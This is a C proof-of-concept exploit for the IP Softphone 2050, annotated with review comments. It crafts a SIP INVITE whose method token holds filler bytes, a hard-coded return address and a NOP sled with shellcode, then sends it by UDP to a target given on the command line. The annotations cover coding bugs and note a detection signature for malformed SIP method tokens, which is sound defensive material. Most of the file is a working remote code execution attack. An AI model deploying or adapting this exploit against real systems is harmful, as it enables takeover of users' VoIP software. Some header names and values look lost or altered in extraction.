/*
 * NOTE(review): the header names after each #include were lost when this
 * listing was extracted (the directives are kept exactly as found, so the
 * file does not preprocess as listed).  From the calls below, the file needs
 * the stdio/stdlib/string headers, the BSD bzero()/bcopy() header, and the
 * BSD socket / gethostbyname() headers — confirm against the original.
 */
#include
#include
#include
#include
#include
#include
#include
#include

/* Size of the outgoing datagram buffer; nothing below checks against it. */
#define BUFSIZE 8192

/* Packet under construction.  Filled by memset/memcpy in main() and then
 * extended with unbounded strcat() through pkcat(). */
char packet[BUFSIZE];

/*
 * Bytes copied into the packet at offset 46: a run of 0x90 (NOP) bytes
 * followed by a short stub whose last instruction calls a hard-coded absolute
 * address.  Both that address and the 4-byte value written at offset 42 are
 * fixed constants, so the PoC only matches one specific target build.
 * No byte in this literal is 0, which matters for the strlen()/strcat() use
 * later on.
 */
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                   "\x31\xD2\x52\x52\x52\x52\xB8\x8A\x05\x45\x7E\xFF\xD0";

/*
 * Print command-line help.
 * NOTE(review): the placeholders between "./xpl1" and "default:5060" appear
 * to have been stripped from this listing (angle-bracketed text); the
 * example line shows the intended four positional arguments.  Declared with
 * an empty parameter list — `void usage(void)` is the proper prototype.
 */
void usage() {
    printf("----------------------------------\n");
    printf("IP Softphone 2050 Exploit - by Zarathu of Helith, found ~2006\n");
    printf("Greetings go out to Helith\n");
    printf("usage: ./xpl1 [ default:5060]\n");
    printf("e.g.\n\n");
    printf("./xpl 6005 10.0.0.202 10.0.0.121 5060\n");
    printf("----------------------------------\n");
}

/*
 * Append `stuff` to the global packet buffer.
 * NOTE(review): strcat() is unbounded — nothing tracks the used length or
 * compares it with BUFSIZE, so argv-derived pieces (num, des) of sufficient
 * length overflow the tool's own buffer.  A bounded append that keeps a
 * running length and refuses anything past BUFSIZE - 1 would remove that.
 */
void pkcat(const char* stuff) {
    strcat(packet, stuff);
}

/*
 * Entry point: builds one SIP INVITE whose request-line method token has been
 * replaced by an overlong string (42 filler bytes, a 4-byte constant, then the
 * payload above) and sends it as a single UDP datagram.
 *
 * argv[1] = number, argv[2] = destination host, argv[3] = server (unused),
 * argv[4] = optional port, default 5060.  Returns 0 after sendto() succeeds;
 * every error path calls exit(1).
 *
 * NOTE(review): the argument check is `argc < 3`, but argv[3] and argv[4]
 * are read unconditionally below.  With exactly two arguments argv[3] is the
 * NULL terminator and argv[4] lies past the end of argv (undefined
 * behaviour).  The check should be `argc < 4`.
 *
 * From a detection standpoint the distinguishing feature of this traffic is
 * a SIP request line whose method position holds a long run of non-token
 * bytes (here 'A's followed by a NOP sled) instead of a method name; a
 * SIP-aware parser rejecting malformed method tokens blocks it outright.
 */
int main(int argc, char* argv[]) {
    printf("\n");
    if(argc < 3) {
        usage();
        exit(1);
    }
    int sockfd, portno, n;   /* n is never used */
    int serverlen, i;        /* i is never used */
    struct sockaddr_in serveraddr;
    struct hostent *server;

    bzero(packet, sizeof(packet));   /* bzero() is legacy; memset() is the portable form */
    /* 42 bytes of filler ... */
    memset(packet, 'A', 42);
    /* ... then a 4-byte constant stored in host byte order.
     * NOTE(review): unaligned int store through a char buffer and a strict-
     * aliasing violation — memcpy() of the bytes is the well-defined form. */
    *(int *) (packet + 42) = 0x7C8369D8;
    /* sizeof includes the literal's terminating NUL, which is what the later
     * strcat() calls find as the end of the string (offset 46 + 25). */
    memcpy(packet + 46, shellcode, sizeof(shellcode));
    char* num;
    num = argv[1];
    char* des;
    des = argv[2];
    char* svr;               /* assigned but never used: the datagram goes to des */
    svr = argv[3];
    /* argv[argc] is NULL, so this read is only in bounds when argc >= 4
     * (see the note above). */
    if(!argv[4]) {
        portno = 5060;
    } else {
        portno = atoi(argv[4]);   /* no error/range check; strtol() would report bad input */
    }
    printf("[+] - Constructing malicious packet\n\n");
    /* Request line: the filler/payload already in the buffer becomes the SIP
     * method token, followed by " sip:<num>@<des> SIP/2.0". */
    pkcat(" sip:");
    pkcat(num);
    pkcat("@");
    pkcat(des);
    pkcat(" SIP/2.0\r\n");
    /* Header block.  NOTE(review): several values (the angle-bracketed URIs
     * in From/Contact, the CRLF after the Contact line, the Via address
     * 10.0.0.999 is not a valid IPv4 address) look altered by extraction; the
     * strings are kept exactly as listed. */
    pkcat(
        "Via: SIP/2.0/UDP 10.0.0.999:5060;branch=z9hG4bK000050\r\n"
        "From: 5 ;tag=5\r\n");
    /* NOTE(review): "Content-Length: 128" does not match the SDP body as it
     * appears here (117 bytes); the original listing may have differed. */
    pkcat("To: Receiver \r\n"
          "Call-ID: 0@localhost\r\n"
          "CSeq: 1 INVITE\r\n"
          "Contact: 5 "
          "Expires: 1200\r\n"
          "Max-Forwards: 70\r\n"
          "Content-Type: application/sdp\r\n"
          "Content-Length: 128\r\n"
          "\r\n"
          "v=0\r\n"
          "o=5 5 5 IN IP4 localhost\r\n"
          "s=Session SDP\r\n"
          "c=IN IP4 127.0.0.1\r\n"
          "t=0 0\r\n"
          "m=audio 9876 RTP/AVP 0\r\n"
          "a=rtpmap:0 PCMU/8000");
    printf("[+] - Opening socket\n\n");
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if(sockfd < 0) {
        printf("[+] - Error opening socket\n");   /* perror() would also show errno */
        exit(1);
    }
    /* gethostbyname() is obsolete (IPv4 only, not thread-safe); getaddrinfo()
     * is the modern replacement. */
    if((server = gethostbyname(des)) == NULL) {
        printf("[+] - Error resolving host, greetings \n");
        exit(1);
    } else {
        printf("[+] - Connecting...\n");   /* UDP: no connection is actually established */
    }
    bzero((char *) &serveraddr,
          sizeof(serveraddr));
    serveraddr.sin_family = AF_INET;
    /* h_length is trusted without comparing it to sizeof serveraddr.sin_addr. */
    bcopy((char *)server->h_addr, (char *)&serveraddr.sin_addr.s_addr, server->h_length);
    serveraddr.sin_port = htons(portno);
    serverlen = sizeof(serveraddr);
    printf("done\n\n");
    /* strlen() stops at the first NUL; the filler, the 4-byte constant and
     * the payload contain none, so the whole constructed buffer is sent in one
     * datagram.  (The `\` is the original's line continuation.) */
    if (sendto(sockfd, packet, strlen(packet), 0, \
        (const struct sockaddr*)&serveraddr, serverlen) < 0) {
        perror("[+] - sendto Error");
        exit(1);
    }
    printf("[+] - Exploit sent!\n\n");
    /* sockfd is never closed; the OS reclaims it at process exit. */
    return (0);
}